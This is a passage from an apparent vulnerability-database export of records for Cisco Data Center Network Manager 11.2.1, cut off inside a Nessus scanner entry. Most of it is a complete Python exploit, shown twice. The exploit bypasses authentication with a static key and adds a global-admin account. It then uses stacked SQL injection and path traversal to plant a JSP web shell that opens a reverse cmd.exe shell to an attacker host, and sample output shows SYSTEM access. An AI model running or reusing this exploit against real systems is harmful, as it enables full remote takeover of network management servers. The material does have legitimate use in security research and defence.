\"\"\"\r\n jsp = \"\"\"\r\n <%%@page import=\"java.lang.*\"%%>\r\n <%%@page import=\"java.util.*\"%%>\r\n <%%@page import=\"java.io.*\"%%>\r\n <%%@page import=\"java.net.*\"%%>\r\n\r\n <%%\r\n // clean up\r\n String[] files = {\r\n \"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/si.xml\", \r\n \"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/\",\r\n \"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/\",\r\n };\r\n for (String s:files){ File f = new File(s); f.delete(); }\r\n File f = new File(application.getRealPath(\"/\" + this.getClass().getSimpleName().replaceFirst(\"_\",\".\")));\r\n f.delete();\r\n class StreamConnector extends Thread\r\n {\r\n InputStream we;\r\n OutputStream uo;\r\n\r\n StreamConnector( InputStream we, OutputStream uo )\r\n {\r\n this.we = we;\r\n this.uo = uo;\r\n }\r\n\r\n public void run()\r\n {\r\n BufferedReader dy = null;\r\n BufferedWriter zvi = null;\r\n try\r\n {\r\n dy = new BufferedReader( new InputStreamReader( this.we ) );\r\n zvi = new BufferedWriter( new OutputStreamWriter( this.uo ) );\r\n char buffer[] = new char[8192];\r\n int length;\r\n while( ( length = dy.read( buffer, 0, buffer.length ) ) > 0 )\r\n {\r\n zvi.write( buffer, 0, length );\r\n zvi.flush();\r\n }\r\n } catch( Exception e ){}\r\n try\r\n {\r\n if( dy != null )\r\n dy.close();\r\n if( zvi != null )\r\n zvi.close();\r\n } catch( Exception e ){}\r\n }\r\n }\r\n\r\n try\r\n {\r\n String ShellPath;\r\n ShellPath = new String(\"cmd.exe\");\r\n Socket socket = new Socket( \"%s\", %s);\r\n Process process = Runtime.getRuntime().exec( ShellPath );\r\n ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();\r\n ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();\r\n } catch( Exception e ) {}\r\n %%>\r\n \"\"\" % (cbh, cbp)\r\n return jsp\r\n\r\ndef get_session(target, user, password):\r\n \"\"\" we have bypassed auth at this point and created an admin \"\"\"\r\n d = {\r\n 
\"j_username\" : user,\r\n \"j_password\" : password\r\n }\r\n uri = \"https://%s/j_spring_security_check\" % target\r\n r = requests.post(uri, data=d, verify=False, allow_redirects=False)\r\n if \"Set-Cookie\" in r.headers:\r\n match = re.search(r\"JSESSIONID=(.{56}).*resttoken=(\\d{1,4}:.{44});\", r.headers[\"Set-Cookie\"])\r\n if match:\r\n sessionid = match.group(1)\r\n resttoken = match.group(2)\r\n return { \"JSESSIONID\" : sessionid, \"resttoken\": resttoken}\r\n return False\r\n\r\ndef craft_soap_header():\r\n soap_header = '\\t<SOAP-ENV:Header xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">'\r\n soap_header += '<m:ssoToken xmlns:m=\"http://ep.jaxws.dcbu.cisco.com/\">%s</m:ssoToken>' % gen_ssotoken()\r\n soap_header += '\\t</SOAP-ENV:Header>'\r\n return soap_header\r\n\r\ndef we_can_trigger_folder_path_creation(target):\r\n \"\"\" craft the path location and db entry for the traversal \"\"\"\r\n soap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">'\r\n soap_body += craft_soap_header()\r\n soap_body += '\\t<soapenv:Body>'\r\n soap_body += '\\t\\t<ep:saveReportTemplate>'\r\n soap_body += '\\t\\t\\t<reportTemplateName>si</reportTemplateName>'\r\n soap_body += '\\t\\t\\t<userName>1337</userName>'\r\n soap_body += '\\t\\t\\t<updatedAttrs></updatedAttrs>'\r\n soap_body += '\\t\\t\\t<pmInterval>1337</pmInterval>'\r\n soap_body += '\\t\\t</ep:saveReportTemplate>'\r\n soap_body += '\\t</soapenv:Body>'\r\n soap_body += '</soapenv:Envelope>'\r\n uri = \"https://%s/ReportWSService/ReportWS\" % target\r\n r = requests.post(uri, data=soap_body, verify=False)\r\n if r.status_code == 200:\r\n return True\r\n return False\r\n\r\ndef we_can_trigger_second_order_write(target, shellpath):\r\n \"\"\" trigger the traversal \"\"\"\r\n soap_body = '<soapenv:Envelope 
xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">'\r\n soap_body += craft_soap_header()\r\n soap_body += '\\t<soapenv:Body>'\r\n soap_body += '\\t\\t<ep:openReportTemplate>'\r\n soap_body += '\\t\\t\\t<reportTemplateName>%s</reportTemplateName>' % shellpath\r\n soap_body += '\\t\\t\\t<userName>1337</userName>'\r\n soap_body += '\\t\\t</ep:openReportTemplate>'\r\n soap_body += '\\t</soapenv:Body>'\r\n soap_body += '</soapenv:Envelope>'\r\n uri = \"https://%s/ReportWSService/ReportWS\" % target\r\n r = requests.post(uri, data=soap_body, verify=False)\r\n if r.status_code == 200:\r\n return True\r\n return False\r\n\r\ndef gen_ssotoken():\r\n \"\"\" auth bypass \"\"\"\r\n timestamp = 9999999999999 # we live forever\r\n username = \"hax\" # doesnt even need to exist!\r\n sessionid = 1337 # doesnt even need to exist!\r\n d = \"%s%d%dPOsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF\" % (username, sessionid, timestamp)\r\n return \"%d.%d.%s.%s\" % (sessionid, timestamp, base64.b64encode(md5.new(d).digest()), username)\r\n\r\ndef we_can_trigger_sql_injection(target, sql):\r\n \"\"\" stacked sqli primitive \"\"\"\r\n sqli = \";%s--\" % sql\r\n soap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">'\r\n soap_body += craft_soap_header()\r\n soap_body += '\\t<soapenv:Body>'\r\n soap_body += '\\t\\t<ep:getVmHostData>'\r\n soap_body += '\\t\\t\\t<arg0>'\r\n soap_body += '\\t\\t\\t\\t<sortField>vcluster</sortField>'\r\n soap_body += '\\t\\t\\t\\t<sortType>%s</sortType>' % sqli\r\n soap_body += '\\t\\t\\t</arg0>'\r\n soap_body += '\\t\\t\\t<arg1></arg1>'\r\n soap_body += '\\t\\t\\t<arg2></arg2>'\r\n soap_body += '\\t\\t\\t<arg3>false</arg3>'\r\n soap_body += '\\t\\t</ep:getVmHostData>'\r\n soap_body += '\\t</soapenv:Body>'\r\n soap_body += '</soapenv:Envelope>'\r\n uri = \"https://%s/DbInventoryWSService/DbInventoryWS\" % 
target\r\n r = requests.post(uri, data=soap_body, verify=False)\r\n if r.status_code == 200:\r\n return True\r\n return False\r\n\r\ndef we_can_leak_vfs(target):\r\n \"\"\" we use a information disclosure for the vfs path \"\"\"\r\n global vfs\r\n uri = 'https://%s/serverinfo/HtmlAdaptor?action=displayServerInfos' % target\r\n c = requests.auth.HTTPBasicAuth('admin', 'nbv_12345')\r\n r = requests.get(uri, verify=False, auth=c)\r\n match = re.search(r\"temp\\\\(.{21}content-.{15,16})\", r.text)\r\n if match:\r\n vfs = str(match.group(1).replace(\"\\\\\",\"/\"))\r\n return True\r\n return False\r\n\r\ndef handler(lp):\r\n \"\"\" this is the client handler, to catch the connectback \"\"\"\r\n print \"(+) starting handler on port %d\" % lp\r\n t = telnetlib.Telnet()\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.bind((\"0.0.0.0\", lp))\r\n s.listen(1)\r\n conn, addr = s.accept()\r\n print \"(+) connection from %s\" % addr[0]\r\n t.sock = conn\r\n print \"(+) pop thy shell!\"\r\n t.interact()\r\n\r\ndef exec_code(t, usr, pwd, cbp):\r\n \"\"\" this function threads the client handler and sends off the attacking payload \"\"\"\r\n handlerthr = Thread(target=handler, args=(int(cbp),))\r\n handlerthr.start()\r\n r = requests.get(\"https://%s/si.jsp\" % t, cookies=get_session(t, usr, pwd), verify=False)\r\n\r\ndef we_can_add_user(target, usr, pwd):\r\n \"\"\" add a user so that we can reach our backdoor! 
\"\"\"\r\n soap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">'\r\n soap_body += craft_soap_header()\r\n soap_body += '\\t<soapenv:Body>'\r\n soap_body += '\\t\\t<ep:addUser>'\r\n soap_body += '\\t\\t\\t<userName>%s</userName>' % usr\r\n soap_body += '\\t\\t\\t<password>%s</password>' % pwd\r\n soap_body += '\\t\\t\\t<roleName>global-admin</roleName>'\r\n soap_body += '\\t\\t\\t<enablePwdExpiration>false</enablePwdExpiration>'\r\n soap_body += '\\t\\t</ep:addUser>'\r\n soap_body += '\\t</soapenv:Body>'\r\n soap_body += '</soapenv:Envelope>'\r\n uri = \"https://%s/DbAdminWSService/DbAdminWS\" % target\r\n r = requests.post(uri, data=soap_body, verify=False)\r\n tree = ElementTree.fromstring(r.content)\r\n for elem in tree.iter():\r\n if elem.tag == \"resultMessage\":\r\n res = elem.text\r\n if res == \"Success\":\r\n return True\r\n elif res == \"User already exists.\":\r\n return True\r\n return False\r\n\r\ndef main():\r\n\r\n usr = \"hacker\"\r\n pwd = \"Hacked123\"\r\n\r\n if len(sys.argv) != 3:\r\n print \"(+) usage: %s <target> <connectback>\" % sys.argv[0]\r\n print \"(+) eg: %s 192.168.100.122 192.168.100.59:1337\" % sys.argv[0]\r\n sys.exit(1)\r\n\r\n t = sys.argv[1]\r\n c = sys.argv[2]\r\n\r\n cbh = c.split(\":\")[0]\r\n cbp = c.split(\":\")[1]\r\n sc = _get_jsp(cbh, cbp).encode(\"hex\")\r\n\r\n # stage 1 - add a user\r\n if we_can_add_user(t, usr, pwd):\r\n print \"(+) created the account %s:%s\" % (usr, pwd)\r\n\r\n # stage 2 - trigger folder creation and db entry\r\n if we_can_trigger_folder_path_creation(t):\r\n print \"(+) created the 1337/custom path!\"\r\n\r\n # stage 3 - leak the vfs path (not really required I suppose)\r\n if we_can_leak_vfs(t):\r\n print \"(+) leaked vfs! 
%s\" % vfs\r\n\r\n # stage 4 - trigger the sql injection to update our template entry\r\n sp = \"../../../../wildfly-10.1.0.Final/standalone/tmp/vfs/temp/%s/si.jsp\" % vfs\r\n sql = \"update xmldocs set document_name='%s',content=decode('%s','hex') where user_name='1337';\" % (sp, sc)\r\n if we_can_trigger_sql_injection(t, sql):\r\n print \"(+) SQL Injection working!\"\r\n\r\n # stage 5 - trigger the shell write\r\n if we_can_trigger_second_order_write(t, sp):\r\n print \"(+) wrote the si.jsp shell!\"\r\n\r\n # stage 6 - cleanup\r\n sql = \"delete from xmldocs where user_name='1337';\"\r\n if we_can_trigger_sql_injection(t, sql):\r\n print \"(+) cleaned up the database!\"\r\n\r\n # stage 7 - go get some rce\r\n exec_code(t, usr, pwd, cbp)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n\n\n# 0day.today [2020-02-06] #", "sourceHref": "https://0day.today/exploit/33920", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-08-16T06:07:48", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-06T00:00:00", "type": "exploitdb", "title": "Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-15976", "2019-15984", "CVE-2019-15976", "CVE-2019-15984"], "modified": "2020-02-06T00:00:00", "id": "EDB-ID:48019", "href": "https://www.exploit-db.com/exploits/48019", "sourceData": "#!/usr/bin/python\r\n\"\"\"\r\nCisco Data Center Network Manager HostEnclHandler getVmHostData SQL Injection Remote Code Execution Vulnerability\r\n\r\nTested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)\r\n- Release: 11.2(1)\r\n- Release Date: 18-Jun-2019\r\n- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip\r\n- Size: 1619.36 MB (1698022100 bytes)\r\n- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5 \r\n\r\nBug 1: CVE-2019-15976 / ZDI-20-008\r\nBug 2: CVE-2019-15984 / ZDI-20-060\r\n\r\nExample:\r\n========\r\n\r\nsaturn:~ mr_me$ ./poc.py \r\n(+) usage: ./poc.py <target> <connectback>\r\n(+) eg: ./poc.py 192.168.100.122 192.168.100.59:1337\r\n\r\nsaturn:~ mr_me$ ./poc.py 192.168.100.122 192.168.100.59:1337\r\n(+) created the account hacker:Hacked123\r\n(+) created the 1337/custom path!\r\n(+) leaked vfs! temp230cf31722794196/content-ed98b5003b1c695c\r\n(+) SQL Injection working!\r\n(+) wrote the si.jsp shell!\r\n(+) cleaned up the database!\r\n(+) starting handler on port 1337\r\n(+) connection from 192.168.100.122\r\n(+) pop thy shell!\r\nMicrosoft Windows [Version 6.3.9600]\r\n(c) 2013 Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Program Files\\Cisco Systems\\dcm\\wildfly-10.1.0.Final\\bin\\service>whoami\r\nwhoami\r\nnt authority\\system\r\n\r\nC:\\Program Files\\Cisco Systems\\dcm\\wildfly-10.1.0.Final\\bin\\service>\r\n\r\nClean Up:\r\n=========\r\n\r\n1. delete from xmlDocs where user_name = '1337';\r\n2. delete si.jsp from the web root\r\n3. 
delete the folder and its contents: C:/Program Files/Cisco Systems/dcm/fm/reports/1337\r\n\"\"\"\r\n\r\nimport re\r\nimport md5\r\nimport sys\r\nimport time\r\nimport socket\r\nimport base64\r\nimport requests\r\nimport telnetlib\r\nfrom threading import Thread\r\nfrom xml.etree import ElementTree\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n\r\ndef _get_jsp(cbh, cbp):\r\n \"\"\" get me some jsp for a connectback! \"\"\"\r\n jsp = \"\"\"\r\n <%%@page import=\"java.lang.*\"%%>\r\n <%%@page import=\"java.util.*\"%%>\r\n <%%@page import=\"java.io.*\"%%>\r\n <%%@page import=\"java.net.*\"%%>\r\n\r\n <%%\r\n // clean up\r\n String[] files = {\r\n \"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/si.xml\", \r\n \"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/\",\r\n \"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/\",\r\n };\r\n for (String s:files){ File f = new File(s); f.delete(); }\r\n File f = new File(application.getRealPath(\"/\" + this.getClass().getSimpleName().replaceFirst(\"_\",\".\")));\r\n f.delete();\r\n class StreamConnector extends Thread\r\n {\r\n InputStream we;\r\n OutputStream uo;\r\n\r\n StreamConnector( InputStream we, OutputStream uo )\r\n {\r\n this.we = we;\r\n this.uo = uo;\r\n }\r\n\r\n public void run()\r\n {\r\n BufferedReader dy = null;\r\n BufferedWriter zvi = null;\r\n try\r\n {\r\n dy = new BufferedReader( new InputStreamReader( this.we ) );\r\n zvi = new BufferedWriter( new OutputStreamWriter( this.uo ) );\r\n char buffer[] = new char[8192];\r\n int length;\r\n while( ( length = dy.read( buffer, 0, buffer.length ) ) > 0 )\r\n {\r\n zvi.write( buffer, 0, length );\r\n zvi.flush();\r\n }\r\n } catch( Exception e ){}\r\n try\r\n {\r\n if( dy != null )\r\n dy.close();\r\n if( zvi != null )\r\n zvi.close();\r\n } catch( Exception e ){}\r\n }\r\n }\r\n\r\n try\r\n {\r\n String ShellPath;\r\n ShellPath = new 
String(\"cmd.exe\");\r\n Socket socket = new Socket( \"%s\", %s);\r\n Process process = Runtime.getRuntime().exec( ShellPath );\r\n ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();\r\n ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();\r\n } catch( Exception e ) {}\r\n %%>\r\n \"\"\" % (cbh, cbp)\r\n return jsp\r\n\r\ndef get_session(target, user, password):\r\n \"\"\" we have bypassed auth at this point and created an admin \"\"\"\r\n d = {\r\n \"j_username\" : user,\r\n \"j_password\" : password\r\n }\r\n uri = \"https://%s/j_spring_security_check\" % target\r\n r = requests.post(uri, data=d, verify=False, allow_redirects=False)\r\n if \"Set-Cookie\" in r.headers:\r\n match = re.search(r\"JSESSIONID=(.{56}).*resttoken=(\\d{1,4}:.{44});\", r.headers[\"Set-Cookie\"])\r\n if match:\r\n sessionid = match.group(1)\r\n resttoken = match.group(2)\r\n return { \"JSESSIONID\" : sessionid, \"resttoken\": resttoken}\r\n return False\r\n\r\ndef craft_soap_header():\r\n soap_header = '\\t<SOAP-ENV:Header xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">'\r\n soap_header += '<m:ssoToken xmlns:m=\"http://ep.jaxws.dcbu.cisco.com/\">%s</m:ssoToken>' % gen_ssotoken()\r\n soap_header += '\\t</SOAP-ENV:Header>'\r\n return soap_header\r\n\r\ndef we_can_trigger_folder_path_creation(target):\r\n \"\"\" craft the path location and db entry for the traversal \"\"\"\r\n soap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">'\r\n soap_body += craft_soap_header()\r\n soap_body += '\\t<soapenv:Body>'\r\n soap_body += '\\t\\t<ep:saveReportTemplate>'\r\n soap_body += '\\t\\t\\t<reportTemplateName>si</reportTemplateName>'\r\n soap_body += '\\t\\t\\t<userName>1337</userName>'\r\n soap_body += 
'\\t\\t\\t<updatedAttrs></updatedAttrs>'\r\n soap_body += '\\t\\t\\t<pmInterval>1337</pmInterval>'\r\n soap_body += '\\t\\t</ep:saveReportTemplate>'\r\n soap_body += '\\t</soapenv:Body>'\r\n soap_body += '</soapenv:Envelope>'\r\n uri = \"https://%s/ReportWSService/ReportWS\" % target\r\n r = requests.post(uri, data=soap_body, verify=False)\r\n if r.status_code == 200:\r\n return True\r\n return False\r\n\r\ndef we_can_trigger_second_order_write(target, shellpath):\r\n \"\"\" trigger the traversal \"\"\"\r\n soap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">'\r\n soap_body += craft_soap_header()\r\n soap_body += '\\t<soapenv:Body>'\r\n soap_body += '\\t\\t<ep:openReportTemplate>'\r\n soap_body += '\\t\\t\\t<reportTemplateName>%s</reportTemplateName>' % shellpath\r\n soap_body += '\\t\\t\\t<userName>1337</userName>'\r\n soap_body += '\\t\\t</ep:openReportTemplate>'\r\n soap_body += '\\t</soapenv:Body>'\r\n soap_body += '</soapenv:Envelope>'\r\n uri = \"https://%s/ReportWSService/ReportWS\" % target\r\n r = requests.post(uri, data=soap_body, verify=False)\r\n if r.status_code == 200:\r\n return True\r\n return False\r\n\r\ndef gen_ssotoken():\r\n \"\"\" auth bypass \"\"\"\r\n timestamp = 9999999999999 # we live forever\r\n username = \"hax\" # doesnt even need to exist!\r\n sessionid = 1337 # doesnt even need to exist!\r\n d = \"%s%d%dPOsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF\" % (username, sessionid, timestamp)\r\n return \"%d.%d.%s.%s\" % (sessionid, timestamp, base64.b64encode(md5.new(d).digest()), username)\r\n\r\ndef we_can_trigger_sql_injection(target, sql):\r\n \"\"\" stacked sqli primitive \"\"\"\r\n sqli = \";%s--\" % sql\r\n soap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">'\r\n soap_body += craft_soap_header()\r\n soap_body += '\\t<soapenv:Body>'\r\n 
soap_body += '\\t\\t<ep:getVmHostData>'\r\n soap_body += '\\t\\t\\t<arg0>'\r\n soap_body += '\\t\\t\\t\\t<sortField>vcluster</sortField>'\r\n soap_body += '\\t\\t\\t\\t<sortType>%s</sortType>' % sqli\r\n soap_body += '\\t\\t\\t</arg0>'\r\n soap_body += '\\t\\t\\t<arg1></arg1>'\r\n soap_body += '\\t\\t\\t<arg2></arg2>'\r\n soap_body += '\\t\\t\\t<arg3>false</arg3>'\r\n soap_body += '\\t\\t</ep:getVmHostData>'\r\n soap_body += '\\t</soapenv:Body>'\r\n soap_body += '</soapenv:Envelope>'\r\n uri = \"https://%s/DbInventoryWSService/DbInventoryWS\" % target\r\n r = requests.post(uri, data=soap_body, verify=False)\r\n if r.status_code == 200:\r\n return True\r\n return False\r\n\r\ndef we_can_leak_vfs(target):\r\n \"\"\" we use a information disclosure for the vfs path \"\"\"\r\n global vfs\r\n uri = 'https://%s/serverinfo/HtmlAdaptor?action=displayServerInfos' % target\r\n c = requests.auth.HTTPBasicAuth('admin', 'nbv_12345')\r\n r = requests.get(uri, verify=False, auth=c)\r\n match = re.search(r\"temp\\\\(.{21}content-.{15,16})\", r.text)\r\n if match:\r\n vfs = str(match.group(1).replace(\"\\\\\",\"/\"))\r\n return True\r\n return False\r\n\r\ndef handler(lp):\r\n \"\"\" this is the client handler, to catch the connectback \"\"\"\r\n print \"(+) starting handler on port %d\" % lp\r\n t = telnetlib.Telnet()\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.bind((\"0.0.0.0\", lp))\r\n s.listen(1)\r\n conn, addr = s.accept()\r\n print \"(+) connection from %s\" % addr[0]\r\n t.sock = conn\r\n print \"(+) pop thy shell!\"\r\n t.interact()\r\n\r\ndef exec_code(t, usr, pwd, cbp):\r\n \"\"\" this function threads the client handler and sends off the attacking payload \"\"\"\r\n handlerthr = Thread(target=handler, args=(int(cbp),))\r\n handlerthr.start()\r\n r = requests.get(\"https://%s/si.jsp\" % t, cookies=get_session(t, usr, pwd), verify=False)\r\n\r\ndef we_can_add_user(target, usr, pwd):\r\n \"\"\" add a user so that we can reach our backdoor! 
\"\"\"\r\n soap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">'\r\n soap_body += craft_soap_header()\r\n soap_body += '\\t<soapenv:Body>'\r\n soap_body += '\\t\\t<ep:addUser>'\r\n soap_body += '\\t\\t\\t<userName>%s</userName>' % usr\r\n soap_body += '\\t\\t\\t<password>%s</password>' % pwd\r\n soap_body += '\\t\\t\\t<roleName>global-admin</roleName>'\r\n soap_body += '\\t\\t\\t<enablePwdExpiration>false</enablePwdExpiration>'\r\n soap_body += '\\t\\t</ep:addUser>'\r\n soap_body += '\\t</soapenv:Body>'\r\n soap_body += '</soapenv:Envelope>'\r\n uri = \"https://%s/DbAdminWSService/DbAdminWS\" % target\r\n r = requests.post(uri, data=soap_body, verify=False)\r\n tree = ElementTree.fromstring(r.content)\r\n for elem in tree.iter():\r\n if elem.tag == \"resultMessage\":\r\n res = elem.text\r\n if res == \"Success\":\r\n return True\r\n elif res == \"User already exists.\":\r\n return True\r\n return False\r\n\r\ndef main():\r\n\r\n usr = \"hacker\"\r\n pwd = \"Hacked123\"\r\n\r\n if len(sys.argv) != 3:\r\n print \"(+) usage: %s <target> <connectback>\" % sys.argv[0]\r\n print \"(+) eg: %s 192.168.100.122 192.168.100.59:1337\" % sys.argv[0]\r\n sys.exit(1)\r\n\r\n t = sys.argv[1]\r\n c = sys.argv[2]\r\n\r\n cbh = c.split(\":\")[0]\r\n cbp = c.split(\":\")[1]\r\n sc = _get_jsp(cbh, cbp).encode(\"hex\")\r\n\r\n # stage 1 - add a user\r\n if we_can_add_user(t, usr, pwd):\r\n print \"(+) created the account %s:%s\" % (usr, pwd)\r\n\r\n # stage 2 - trigger folder creation and db entry\r\n if we_can_trigger_folder_path_creation(t):\r\n print \"(+) created the 1337/custom path!\"\r\n\r\n # stage 3 - leak the vfs path (not really required I suppose)\r\n if we_can_leak_vfs(t):\r\n print \"(+) leaked vfs! 
%s\" % vfs\r\n\r\n # stage 4 - trigger the sql injection to update our template entry\r\n sp = \"../../../../wildfly-10.1.0.Final/standalone/tmp/vfs/temp/%s/si.jsp\" % vfs\r\n sql = \"update xmldocs set document_name='%s',content=decode('%s','hex') where user_name='1337';\" % (sp, sc)\r\n if we_can_trigger_sql_injection(t, sql):\r\n print \"(+) SQL Injection working!\"\r\n\r\n # stage 5 - trigger the shell write\r\n if we_can_trigger_second_order_write(t, sp):\r\n print \"(+) wrote the si.jsp shell!\"\r\n\r\n # stage 6 - cleanup\r\n sql = \"delete from xmldocs where user_name='1337';\"\r\n if we_can_trigger_sql_injection(t, sql):\r\n print \"(+) cleaned up the database!\"\r\n\r\n # stage 7 - go get some rce\r\n exec_code(t, usr, pwd, cbp)\r\n\r\nif __name__ == \"__main__\":\r\n main()", "sourceHref": "https://www.exploit-db.com/download/48019", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-11T15:05:17", "description": "According to its self-reported version number, the instance of Cisco DCNM hosted on the remote server is prior to 11.3(1). It is, therefore, affected by multiple vulnerabilities:\n\n - An authentication bypass vulnerability exists in the REST API, SOAP API, and the web-based management interface due to a static encryption key being shared between installations. An unauthenticated, remote attacker can exploit this, via the REST API, SOAP API, or web-based management interface, to bypass authentication and execute arbitrary actions with administrative privileges. (CVE-2019-15975, CVE-2019-15976, CVE-2019-15977)\n\n - A command injection vulnerability exists in the REST API and SOAP API due to insufficient validation of user-supplied input. An authenticated, remote attacker can exploit this, via the APIs, to execute arbitrary commands. (CVE-2019-15978, CVE-2019-15979)\n\n - A path traversal vulnerability exists in the REST API and SOAP API due to insufficient validation of user-supplied input. 
An authenticated, remote attacker can exploit this, via the APIs, to read, write, or execute arbitrary files on the system. (CVE-2019-15980, CVE-2019-15981, CVE-2019-15982)\n\n - An XML external entity (XXE) vulnerability exists due to an incorrectly configured XML parser accepting XML external entities from an untrusted source. An authenticated, remote attacker can exploit this, via specially crafted XML data in the SOAP API, to disclose sensitive information. (CVE-2019-15983)\n\n - A SQL injection (SQLi) vulnerability exists in the SOAP API and REST API due to improper validation of user-supplied input. An authenticated, remote attacker can exploit this to inject or manipulate SQL queries in the back-end database, resulting in the disclosure or manipulation of arbitrary data.\n (CVE-2019-15984, CVE-2019-15985, CVE-2019-15986)\n\n - A vulnerability exists in the authentication settings of the JBOSS EAP due to an incorrect configuration.\n An authenticated, remote attacker can exploit this by authentication with a specific low-privilege account, to gain unauthorized access to the JBOSS EAP. 
(CVE-2019-15999)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-09T00:00:00", "type": "nessus", "title": "Cisco Data Center Network Manager < 11.3(1) Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15975", "CVE-2019-15976", "CVE-2019-15977", "CVE-2019-15978", "CVE-2019-15979", "CVE-2019-15980", "CVE-2019-15981", "CVE-2019-15982", "CVE-2019-15983", "CVE-2019-15984", "CVE-2019-15985", "CVE-2019-15986", "CVE-2019-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:cisco:data_center_network_manager"], "id": "CISCO-SA-20200102-DCNM.NASL", "href": "https://www.tenable.com/plugins/nessus/132721", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132721);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2019-15975\",\n \"CVE-2019-15976\",\n \"CVE-2019-15977\",\n \"CVE-2019-15978\",\n \"CVE-2019-15979\",\n \"CVE-2019-15980\",\n \"CVE-2019-15981\",\n 